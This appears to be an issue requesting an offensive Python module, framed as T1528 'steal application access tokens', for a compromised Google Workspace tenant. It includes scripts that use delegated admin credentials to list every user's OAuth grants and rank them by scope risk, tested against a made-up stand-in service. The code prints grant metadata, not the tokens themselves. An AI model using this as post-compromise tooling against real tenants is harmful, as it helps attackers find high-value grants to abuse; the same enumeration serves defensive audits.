[Feature Request] Add Python module for Stealing Application Access Tokens #9

@DefSecSentinel

Description

🐍 Python Module for MITRE ATT&CK Technique

Tactic Name: Credential Access

Technique Name: Steal Application Access Token

Technique ID: T1528

Technique Description: Adversaries can steal application access tokens as a means of acquiring credentials to access remote systems and resources.

Describe the solution you'd like

An Application Access Token Stealing Module for use with a compromised GWS environment for Credential Access.

Requirements:
- Google Admin SDK API enabled
- Python packages (google-auth, google-auth-oauthlib, google-auth-httplib2, google-api-python-client, email, base64)
- Scopes (https://www.googleapis.com/auth/admin.directory.user)

Module Workflow:
Step 1: Collect all available Application Access Tokens

Module Actions:
 1. Authenticate
 2. Build the Directory API client
 3. Retrieve the list of application access tokens
 4. Print the access tokens

ChatGPT Example Script

from google.oauth2 import service_account
from googleapiclient.discovery import build

# replace with the path to your service account key file
KEY_FILE_LOCATION = '/path/to/service_account_key.json'

# replace with your customer ID ('my_customer' is an alias for the
# customer that the impersonated admin belongs to)
CUSTOMER_ID = 'my_customer'

# replace with a Workspace admin the service account may impersonate via
# domain-wide delegation; the Directory API only accepts calls made as a
# Workspace user, not as a bare service account
ADMIN_SUBJECT = 'admin@example.com'

# tokens.list requires the user.security scope and users.list requires a
# directory.user scope; the group.member.readonly scope used originally
# grants neither
SCOPES = [
    'https://www.googleapis.com/auth/admin.directory.user.readonly',
    'https://www.googleapis.com/auth/admin.directory.user.security',
]

# create delegated credentials from the service account key file
credentials = service_account.Credentials.from_service_account_file(
    KEY_FILE_LOCATION, scopes=SCOPES, subject=ADMIN_SUBJECT)

# build the Directory API client
directory_service = build('admin', 'directory_v1', credentials=credentials)

# tokens.list is keyed by user (userKey), not by customer, so walk the
# user list page by page and query each user's OAuth grants
page_token = None
while True:
    users = directory_service.users().list(
        customer=CUSTOMER_ID, maxResults=500, pageToken=page_token).execute()
    for user in users.get('users', []):
        email = user['primaryEmail']
        tokens = directory_service.tokens().list(userKey=email).execute()
        # print the access tokens; the token resource has no applicationName,
        # displayText carries the application name
        for token in tokens.get('items', []):
            print(email, token.get('displayText'), token.get('clientId'), token.get('scopes'))
    page_token = users.get('nextPageToken')
    if not page_token:
        break
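The workflow in the issue (authenticate, build the Directory client, enumerate OAuth grants, report them) has one detail the sketch above glosses over: tokens.list is keyed by userKey, so collecting every grant in a customer means paging through users.list with nextPageToken and calling tokens.list once per user. The block below is an added example written for this issue, not code from the project or from @DefSecSentinel. It is written against the resource/method chain that google-api-python-client exposes (service.users().list(...).execute(), service.tokens().list(userKey=...).execute()), so a real client from build('admin', 'directory_v1', credentials=...) can be passed as service; FakeDirectoryService is a constructed stand-in with made-up users and grants so the example runs offline and exercises the pagination path. The risk scoring and the HIGH_RISK_SCOPES set are illustrative assumptions about which grants matter most to an attacker (or to a defender auditing consent-phishing), not an official ranking.

```python
"""Enumerate OAuth grants (Directory API token resources) for every user in a
Google Workspace customer and rank them by the reach of the scopes they hold.

Added example for this issue; not the project's own code. `service` is any
object exposing the google-api-python-client chain
    service.users().list(customer=..., maxResults=..., pageToken=...).execute()
    service.tokens().list(userKey=...).execute()
FakeDirectoryService below is a constructed stand-in with made-up data.
"""
from dataclasses import dataclass

# Illustrative set (an assumption, not an official list): scopes whose grant
# gives a token holder persistent read/write access to mail, files, identity
# or cloud resources.
HIGH_RISK_SCOPES = {
    'https://mail.google.com/',
    'https://www.googleapis.com/auth/gmail.readonly',
    'https://www.googleapis.com/auth/gmail.modify',
    'https://www.googleapis.com/auth/drive',
    'https://www.googleapis.com/auth/drive.readonly',
    'https://www.googleapis.com/auth/admin.directory.user',
    'https://www.googleapis.com/auth/cloud-platform',
}


@dataclass
class Grant:
    user: str
    client_id: str
    display_text: str      # application name as shown on the consent screen
    scopes: list
    native_app: bool       # token issued to an installed desktop/mobile app
    anonymous: bool        # client ID is not registered with Google

    @property
    def risk_score(self) -> int:
        """Heuristic (assumption): 10 per high-risk scope, +5 for an
        unregistered client, +1 for a hosted app usable from anywhere."""
        score = 10 * len(set(self.scopes) & HIGH_RISK_SCOPES)
        if self.anonymous:
            score += 5
        if not self.native_app:
            score += 1
        return score


def iter_users(service, customer='my_customer', page_size=500):
    """Yield primaryEmail of every user, following nextPageToken to the end."""
    page_token = None
    while True:
        resp = service.users().list(customer=customer, maxResults=page_size,
                                    pageToken=page_token).execute()
        for user in resp.get('users', []):
            yield user['primaryEmail']
        page_token = resp.get('nextPageToken')
        if not page_token:
            return


def collect_grants(service, customer='my_customer'):
    """One tokens.list call per user; returns grants sorted by risk, highest first."""
    grants = []
    for email in iter_users(service, customer):
        resp = service.tokens().list(userKey=email).execute()
        for item in resp.get('items', []):
            grants.append(Grant(
                user=email,
                client_id=item.get('clientId', ''),
                display_text=item.get('displayText', ''),
                scopes=item.get('scopes', []),
                native_app=item.get('nativeApp', False),
                anonymous=item.get('anonymous', False),
            ))
    return sorted(grants, key=lambda g: g.risk_score, reverse=True)


class _Request:
    def __init__(self, payload):
        self._payload = payload

    def execute(self):
        return self._payload


class FakeDirectoryService:
    """Constructed stand-in for the discovery client. All data is made up;
    pages are forced to two users so the pagination loop is exercised."""
    USERS = [{'primaryEmail': 'alice@example.com'},
             {'primaryEmail': 'bob@example.com'},
             {'primaryEmail': 'carol@example.com'}]
    TOKENS = {
        'alice@example.com': [{
            'clientId': '111.apps.googleusercontent.com',
            'displayText': 'Mail Sync Pro',
            'scopes': ['https://mail.google.com/',
                       'https://www.googleapis.com/auth/drive.readonly'],
            'nativeApp': False, 'anonymous': True}],
        'bob@example.com': [{
            'clientId': '222.apps.googleusercontent.com',
            'displayText': 'Calendar Widget',
            'scopes': ['https://www.googleapis.com/auth/calendar.readonly'],
            'nativeApp': True, 'anonymous': False}],
        'carol@example.com': [],
    }
    PAGE = 2

    def users(self):
        return self

    def tokens(self):
        return self

    def list(self, **kw):
        if 'userKey' in kw:                      # tokens.list
            return _Request({'items': self.TOKENS.get(kw['userKey'], [])})
        start = int(kw.get('pageToken') or 0)    # users.list, numeric fake page token
        end = start + self.PAGE
        page = {'users': self.USERS[start:end]}
        if end < len(self.USERS):
            page['nextPageToken'] = str(end)
        return _Request(page)


if __name__ == '__main__':
    for g in collect_grants(FakeDirectoryService()):
        print(f'{g.risk_score:3d} {g.user:20s} {g.display_text!r} {g.client_id} {g.scopes}')
```

Swap FakeDirectoryService for the real client built with delegated service-account credentials and the same two functions walk the whole customer; the sorted output puts grants such as a hosted, unregistered app holding full Gmail and Drive read access at the top, which is exactly the grant an attacker would steal and a defender would revoke with tokens.delete.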
